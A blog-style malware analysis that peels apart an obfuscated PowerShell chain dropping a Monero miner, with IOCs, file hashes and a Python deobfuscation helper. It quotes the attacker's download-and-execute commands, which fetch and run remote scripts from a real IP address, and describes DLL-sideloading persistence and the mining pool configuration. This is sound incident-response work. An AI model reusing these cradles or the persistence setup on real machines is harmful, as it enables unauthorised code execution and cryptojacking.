I came across an APT-level cryptominer for Monero (XMR) in a compromised environment, so let's take a look.
Decoded 2021-11-06.
First seen 2021-11-06.
Note that there are some related files (found in the zip file below) that were seen on VirusTotal and are tied to an APT detection. For the code itself, however, there is no trace anywhere, so this is the first known public decoding. Enjoy!

Here is a breakdown of the attack/code and how it was obfuscated and what it does.

Before we start
Everything kicked off with an elevated cmd (running as SYSTEM) that downloaded coin.ps1.
This was achieved by exploiting a vulnerability that had been disclosed less than 20 days earlier.


The beginning
After the initial IR work, this was the download string executed by the adversary:
"C:\Windows\System32\cmd.exe" /c "powershell.exe -nop -Exec Bypass -C IeX (New-Object Net.WebClient).DownloadString('http://104.168.213[.]31:55555/coin.ps1')


COIN.PS1
Let's wget coin.ps1 on my Linux box to see what fish we are dealing with.
$cc = "http://104.168.213[.]31:55555/coin.cmd"
(New-Object Net.WebClient).DownloadFile($cc, "$env:TMP\coin.cmd")
Start-Process "$env:TMP\coin.cmd"



COIN.CMD
Well well well, we are off to the races in base64! I could tell from experience; the == at the end was the giveaway.
cmd /c powershell -e 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


Layer 3 Obfuscating
This is Layer 3 because coin.ps1 and coin.cmd were the first two.
After removing the filler characters, reversing the code and decoding the base64, we get the following string:



Note that I could identify the last part of the code as IEX because:
$pshome[21] comes out as I
$pshome[34] comes out as E
and then simply appending +'X' results in IEX, which stands for Invoke-Expression in PowerShell.


Layer 4 Obfuscating
Deobfuscating the string, removing the IEX and replacing it with | out-string, made it possible to decode the script one layer further.
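As an added helper (not code from the post or from the malware), this Python script automates what the post does by hand at each layer: decode the base64/UTF-16LE argument of powershell -e, optionally un-reverse the text, resolve the $pshome[21]/$pshome[34] index trick, fold the 'i'+'e'+'X' concatenation, and swap the resulting IEX call for | Out-String so the next layer is printed instead of executed. The PSHOME path is an assumption (the default on a 64-bit host) and the sample command is constructed, not coin.cmd.

```python
import base64
import re
# Assumption: default 64-bit PSHOME; the post only states which characters
# $pshome[21] and $pshome[34] resolve to (PowerShell is case-insensitive).
DEFAULT_PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)
PSHOME_INDEX = re.compile(r"\$pshome\[(\d+)\]", re.I)
# 'a'+'b' (a doubled quote is PowerShell's escape inside a single-quoted literal)
CONCAT = re.compile(r"'((?:[^']|'')*)'\s*\+\s*'((?:[^']|'')*)'")
# trailing invoke: | IEX, | Invoke-Expression, | &('ieX'), | .('ieX')
TRAILING_IEX = re.compile(r"\s*\|\s*[&.]?\s*\(?\s*'?(?:iex|invoke-expression)'?\s*\)?\s*$", re.I)
# leading invoke: IEX (...), Invoke-Expression (...), &('ieX') (...)
LEADING_IEX = re.compile(r"^\s*(?:(?:iex|invoke-expression)\b|[&.]\s*\(\s*'iex'\s*\))\s*", re.I)

def decode_encoded_command(b64: str) -> str:
    # the argument of `powershell -e` is base64 over UTF-16LE text
    return base64.b64decode(b64).decode("utf-16-le")

def resolve_pshome_indexes(script: str, pshome: str = DEFAULT_PSHOME) -> str:
    # replace each $pshome[N] with the quoted character it indexes
    return PSHOME_INDEX.sub(lambda m: f"'{pshome[int(m.group(1))]}'", script)

def fold_concatenations(script: str) -> str:
    # collapse 'i'+'e'+'X' style concatenation into one literal, left to right
    while True:
        folded = CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", script)
        if folded == script:
            return folded
        script = folded

def neutralize_iex(script: str) -> str:
    # swap the invoke for | Out-String so the next layer is printed, not run
    script = script.strip()
    if TRAILING_IEX.search(script):
        return TRAILING_IEX.sub(" | Out-String", script)
    if LEADING_IEX.match(script):
        return LEADING_IEX.sub("", script, count=1) + " | Out-String"
    return script

def peel_layer(text: str, reversed_text: bool = False) -> str:
    # one round of the post's manual procedure: decode -e, un-reverse, resolve $pshome, fold, defuse IEX
    m = ENCODED_ARG.search(text)
    if m:
        text = decode_encoded_command(m.group(1))
    if reversed_text:
        text = text[::-1]
    return neutralize_iex(fold_concatenations(resolve_pshome_indexes(text)))

# constructed sample in the style of coin.cmd: an inner command piped to &('ieX')
SAMPLE_LAYER = "( 'Get-Date' ) | &( $pshome[21]+$pshome[34]+'X')"
SAMPLE_COMMAND = "cmd /c powershell -e " + base64.b64encode(SAMPLE_LAYER.encode("utf-16-le")).decode()
```

Run peel_layer on each recovered layer in turn and paste the printed output back in as the next input; when a layer is wrapped in a reversed string, pass reversed_text=True.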




Layer 5 Obfuscating
Same thing here. The IEX is at the start of the script; I removed it and added | out-string at the end.




Layer 6 Obfuscating
Here we see a GitHub link containing what looks like binaries, but I can still see the layer ending in IEX.




Layer 7 Obfuscating
Same thing here: IEX again. I removed it and added | out-string at the end.




Layer 8 Obfuscating
Repeat: IEX again. I removed it and added | out-string at the end.




Layer 9 Obfuscating (First readable output – First IOC)
Here we get the first readable output. It was later identified as persistence (a scheduled job, not a scheduled task!) plus a new attempt to download the binaries.



From here it is obviously two steps, but I focused on the first part of the code; the second part comes in Layer 15.
Here we clearly see that the first section is a WMI instance (process) that launches DismMSN.exe, which at this point is completely unknown to us.
The second part is a scheduled job (persistence) named Get-DCDiskSpace, and it is our first IOC.

First IOC
Here is a PowerShell command to search for the scheduled job:
Get-ScheduledJob -name Get-DCDiskSpace


Layer 10 Obfuscating
I chose to continue with the first part from Layer 9, as I wanted to know what DismMSN.exe was and why it was being called. Another GitHub link! Note that it is not the same one as in Layer 6.




Layer 11 Obfuscating
IEX identified and removed from the string; | out-string added at the end.




Layer 12 Obfuscating
IEX identified and removed from the string; | out-string added at the end.




Layer 13 Obfuscating
This layer does not come out as expected when replacing IEX with | out-string.



So I had to tinker and test, trying to separate the lines where I saw . and & signs (they pipe strings in PowerShell). It looks like it sets variables and then runs the code by calling those variables. I ran these lines separately, then the last part, replacing IEX with | out-string.




Layer 14 Obfuscating (Second readable content – Second IOC)
Note how it calls yet ANOTHER GitHub link from the -uri variable and saves the download as DismMSN.zip.
It looks, however, as if the -uri variable is not set before the first else branch (more about that in Layer 20).



DismMSN.zip contains the following files:



And we can correlate this with the DismMSN.exe that was called in Layer 9.
Additionally, even if you are not well versed in the cryptosphere, a look at the config file shows that it is Monero (XMR) cryptomining malware:

config.json has some telling content!

"coin": "XMR",
"url": "asia.randomx-hub.miningpoolhub.com:20580",
"user": "flaksdjf.worker",
"pass": "x",


Second IOC
We can also see that it stores these files under %appdata%\DismMSN.
This is our second IOC.

Note that DismMSN.exe is not malicious on its own; it sideloads the DismCore.dll placed in the same directory.
This is not my area of expertise, but DismCore.dll seems to load Update.dat in memory, which in turn triggers xmrig.exe.

Additionally, here are the hashes for the files in my case:

[NAME] [SHA1 base32] [MD5]
config.json 4WQA4EV6RSMSZEYEXDXJ4SUFYDEGRXW7 DD43179BEC8F7F9BFF553ACAD385CBAD
WinRing0x64.sys 2JJUBLUOSKTNFH2ZT7XUE2RLYG2SC4UZ 0C0195C48B6B8582FA6F6373032118DA
DismMSN.exe HMPMG6IGDX7MAI7UC5OJOYZVYXYVFAK4 EBCC4E59DE824F22C090F20168FB5EAE
Update.dat VAZ5DKWFBDFA3KA72VW36PYV4WQ3AE7U 9186D1A534F7923C5B9253223D183A8A
DismCore.dll Z6MEZPOZBGJPAK46G7V45VRJVFZYQRGT 148166ACF1E12169A1BE569770B241F7
xmrig.exe GKDLEJXX4LSFEMGDMFE43UP5IEEETAR7 289225C8E544ADFB55E36BA85E528ED0



Layer 15 Obfuscating
So let's go back to Layer 9 and explore the scheduled job (our first IOC).




Layer 16 Obfuscating
When converted, we find another GitHub link.




Layer 17 Obfuscating
This one is a little scary: the IEX does not fire as it should, but I can see it before the array.
So I tried running this code in my lab without the -jOIN'') part at the end. It spat out nothing, so I then ran ((gET-VARiaBle ('an93'+'x') -Value)-jOIN'') after it and voilà! On to the next step.




Layer 18 Obfuscating
IEX identified at the beginning of the snippet; removing it and adding | out-string at the end gave me this.




Layer 19 Obfuscating
This one is scary as well, so I opted to run it in my lab environment. I could not see the IEX, but I could see that it sets variables and objects and does an invoke at the end. Because this snippet runs "out of context" of the whole script, I felt I could try it. It worked, and the output showed up in the PowerShell error message.




Layer 20 Obfuscating (Jackpot!)
Here is the actual code with the correct -uri variable specified. It points to a Slack channel with no authentication. This is the attacker's "C2" server.



This opens up possibilities on the opsec/offensive-security side.



Takeaway notes:
This is my first decoding; it was great fun and challenging.
My take is that the attack tries (from an already established privilege-escalation foothold) to spawn an XMR crypto miner with resilience and persistence. It also posts status information to a C2 Slack channel. It seems no control was gained this way.



# @ boi
# 2021-11-06